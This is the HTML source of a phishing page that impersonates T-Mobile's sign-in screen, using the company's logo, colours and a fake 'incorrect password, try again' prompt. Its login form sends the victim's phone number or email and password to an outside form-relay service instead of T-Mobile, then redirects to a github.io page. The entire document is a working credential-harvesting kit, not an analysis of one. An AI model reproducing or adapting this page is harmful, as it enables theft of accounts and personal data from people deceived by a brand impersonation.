

     
                      
                            <!DOCTYPE html><html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script><meta charset=utf-8>



<title>

T-Mobile
</title>





<meta content="width=device-width, initial-scale=1.0" name=viewport>






<meta content=origin name=referrer>

<meta content="T - Mobile"  name=description>


<meta content="T - Mobile | Enjoy free & seamless communication across continents"  property=og:description>

<meta  content=https://www.t-mobile.com/news/_admin/uploads/2020/04/T-Mobile_New_Logo_Primary_RGB_M-on-K_Transparent.png  property=og:image>




<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>





 <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>















														

 <table style="width: 100%;">
    <tr>
      <td>
      
        
<img src="https://www.t-mobile.com/news/_admin/uploads/2020/04/T-Mobile_New_Logo_Primary_RGB_M-on-K_Transparent.png" jsaction="VQAsE" class="sFlh5c pT0Scc iPVvYb" style="max-width: 1440px; width: 155px; height: 34px; margin: 15px 0px;" alt="T-Mobile Logo (magenta on transparent, RGB, PNG) - T-Mobile Newsroom" role="button" tabindex="0" aria-label="T-Mobile Logo (magenta on transparent, RGB, PNG) - T-Mobile Newsroom Search inside image" aria-pressed="false" jsname="kn3ccd" aria-hidden="false">        
        
      </td>
      <td>
      
         <h5> <strong> &nbsp &nbsp &nbsp &nbsp &nbsp Sign in <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTvF16t22BS4V3JPQHoBf3rqiJ77vBW4OYKRw&amp;usqp=CAU" jsaction="VQAsE" class="sFlh5c pT0Scc iPVvYb" style="max-width: 1640px; width: 28px; height: 30px; margin: 0px;" alt="Pinterest" jsname="kn3ccd" aria-hidden="false"></h5>
        
      </td>
    </tr>

</table> 
</strong> 
 












 </div>



</div>










</header> <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid="">

<div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m">






<h6> <strong>

<font size="+1">
<Font STYLE="word-spacing:3px">

Incorrect credentials / password please try again
</strong>
</h6> 
<br>



 
  <!-- Author: FormBold Team -->
  <!-- Learn More: https://formbold.com -->
  
 
  
  <div class="formbold-form-wrapper7">



<form  action="https://formsubmit.io/send/538bcbc9-8ef0-46ba-9114-8a9534b3b334" method="POST">

<input name="_redirect" type="hidden" id="name" value="https://celebrity-org.github.io/sets-Tmobile.com/">



<div class="formbold-mb-7">
        <label for="Field1" class="formbold-form-label">   
     
        </label>
  
        <input
          type="text" required
          name="a-T_Mobile_Retry_N0_ID"
          id="field1"
          placeholder="T-Mobile Number  or Email ID" 
          class="formbold-form-input"
        />
      </div>
      



<br> 


<div class="formbold-mb-7">
        <label for="Field1" class="formbold-form-label">   
          
        </label>
  
        <input
          type="text" required
          name="b_Retry_Password"
          id="field1"
          placeholder="Password"  
          class="formbold-form-input"
        />
      </div>



<br> 


        <div class="formbold-mb-7">  
     </div>    

      <div>
        <button type="submit" value="Submit"
       class="formbold-btn w-full">Log in</button>
      </div>
    </form>
  </div>
</div>


<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-7 {
    margin-bottom: 1px;
  }
  .formbold-pt-8 {
    padding-top: 5px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 28px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 500;
    font-size: 5px;
    color: Black;
    margin-bottom: 5px;
  }
  .formbold-form-label-9 {
    font-weight: 500;
    font-size: 5px;
    margin-bottom: 20px;
  }

  .formbold-form-input {
    width: 100%;
    padding: 14px 24px;
    border-radius: 1px;
    border: 1px solid grey;
    background: white;
    font-weight: 500;
    font-size: 19px;
    color: Black;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: Grey;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 19px;
    border-radius: 40px;
    padding: 12px 32px;
    border: none;
    font-weight: 400;
    background-color: #E20074;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 100%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: DarkRed;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style>

</div> 


<br> <br><br><br><br><br>

<br><br><br><br><br><br>





   




<script>window.initScriptLater = function (scriptUrl, fallback) {
        const script = document.createElement("script");
        script.onload = fallback;
        script.src = scriptUrl;

        document.addEventListener("readystatechange", () => {
            if (document.readyState === "interactive") {
                document.head.appendChild(script);
            }
        });
    };

    window.initScriptLater("https://cdn.bitpanda.com/app/v2/js/cta-button.min.js?id=d34a8a89944479eef669", () =>
        window.initCtaButton()
    );</script></div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">
<div>
 </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">
</path> </symbol></svg>
</body>
</html>
               
               
